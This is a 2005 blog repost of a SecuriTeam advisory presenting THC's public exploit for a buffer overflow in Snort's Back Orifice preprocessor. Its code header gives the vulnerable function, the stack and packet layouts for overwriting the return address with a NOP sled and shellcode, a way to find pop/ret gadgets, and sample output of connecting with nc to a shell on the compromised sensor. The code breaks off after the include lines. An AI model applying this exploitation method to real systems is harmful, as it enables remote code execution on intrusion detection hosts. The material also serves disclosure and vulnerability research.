Search This Blog

Thursday, October 27, 2005

[EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Snort Back Orifice Preprocessor Buffer Overflow (Exploit)
------------------------------------------------------------------------

SUMMARY

<http://www.snort.org/> Snort is a widely-deployed, open-source network
intrusion detection system (IDS). Snort preprocessors are modular plugins
that extend functionality by operating on packets before the detection
engine is run.

Presented here is an exploit for the Snort Back Orifice preprocessor
buffer overflow. Exploiting a vulnerable system could allow a remote
attacker to execute arbitrary code.

DETAILS

Vulnerable Systems:
* Snort versions 2.4.0 to 2.4.2
* Sourcefire Intrusion Sensors

Exploit:
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by rd@thc.org
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/

/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i < len ) {
* plaintext = (char) (*pkt_data ^ (BoRand()%256));
* *buf_ptr = plaintext;
* i++;
* pkt_data++;
* buf_ptr++;
*
* len is taken from the BO packet header, so its a buffer
* overflow when len > buf1 size.
*
* The exchange of data between the BO client and server is
* done using encrypted UDP packets
*
* BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html)
* Mnemonic Size in bytes
* MAGIC 8
* LEN 4
* ID 4
* T 1
* DATA variable
* CRC 1
*
* On x86, because of the stack layout, we end up overwriting
* the loop counter (i and len). To solve this problem, we
* can set back the approriate value for i and len. We can
* also able to set a NULL byte to stop the loop.
*
* There is no chance for bruteforce, snort will die after the
* first bad try. On Linux system with kernel 2.6 with VA
* randomized, it would be much harder for a reliable exploit.
*
*
* In case of _non-optimized_ compiled snort binary, the stack
* would looks like this:
*
* [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data]
*
* The exploit could be reliable in this case, by using a
* pop/ret return addess. Lets send to snort a UDP packet
* as the following:
*
* [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][
shellcode ]
* [ Encrypted ][ Non
Encrypted ]
*
* When the overwriting loop stop, pkt_data will point to
* the memory after return address (NOP part) in raw packet
* data. So, using a return address that points to POP/RET
* instructions would be enough for a reliable exploit.
* (objdump -d binary|grep -B1 ret|grep -A1 pop to find one)
*
* This method will work well under linux kernel 2.6 with VA
* randomized also.
*
* In case of optimized binary, it would be harder since
* the counter i, len and buffer pointers could/possibly be
* registered variables. And the register points to buffer
* get poped from stack when the funtion return. In this case,
* the return address should be hard-coded but it would be
* unreliable (especially on linux kernel 2.6 with VA
* randomization patch).
*
* This exploit would generally work. Providing that you know
* how to find and use correct offsets and return address :>
*
*
* Example:
*
* $ ./THCsnortbo
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Usage: ./THCsnortbo host target
*
* Available Targets:
* 1 | manual testing gcc with -O0
* 2 | manual testing gcc with -O2
*
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
*
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>

No comments: